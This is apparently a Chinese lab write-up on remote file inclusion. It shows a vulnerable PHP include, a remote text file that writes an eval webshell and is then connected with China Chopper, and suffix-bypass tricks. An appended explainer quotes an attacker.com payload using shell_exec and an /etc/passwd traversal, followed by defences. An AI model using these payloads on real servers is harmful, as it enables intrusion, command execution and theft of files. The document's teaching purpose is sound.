远程文件包含shell

预备知识

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。

实验目的

远程文件包含shell

实验工具

火狐浏览器菜刀软件工具

实验环境

客户机一台(操作系统为Windows Server 2003)服务器一台(操作系统为Windows Server 2003)

实验步骤

1、访问127.0.0.1/FI/PHP_FI.php?filename=RFI.txt,网页显示是远程文件包含漏洞。

2、访问网址127.0.0.1/yi.txt,可以看到可以访问的木马。

3.访问127.0.0.1/FI/PHP_FI.php?filename=http://127.0.0.1/yi.txt会在当前目录生成一句话木马a.php

3、打开桌面的【实验工具】文件夹,双击打开【中国菜刀】文件夹,找到【中国菜刀.exe】,双击打开。

利用远程文件漏洞用菜刀连接,空白处右击选择【添加】。

地址处填写http://127.0.0.1/FI/a.php。添加完毕,双击新添加的记录进行运行

 

 

1.本机上2.php的代码如下

<?php
     $sj=$_GET['sj'];
     include($sj);
?>

假如我们不能上传文件,又想拿到shell,我们ke'y可以先写一个muma.txt,内容如下:

<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>

访问http://ip1/2.php?sj=http://ip2/muma.txt

上菜刀

2(绕过方式).本机上2.php的代码如下

<?php
     $sj=$_GET['sj'];
     include($sj.".html");
?>

muma.txt如上

访问http://ip1/2.php?sj=http://ip2/muma.txt?

上菜刀

绕过方式分为(1.?绕过  2.#绕过%23)

 

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值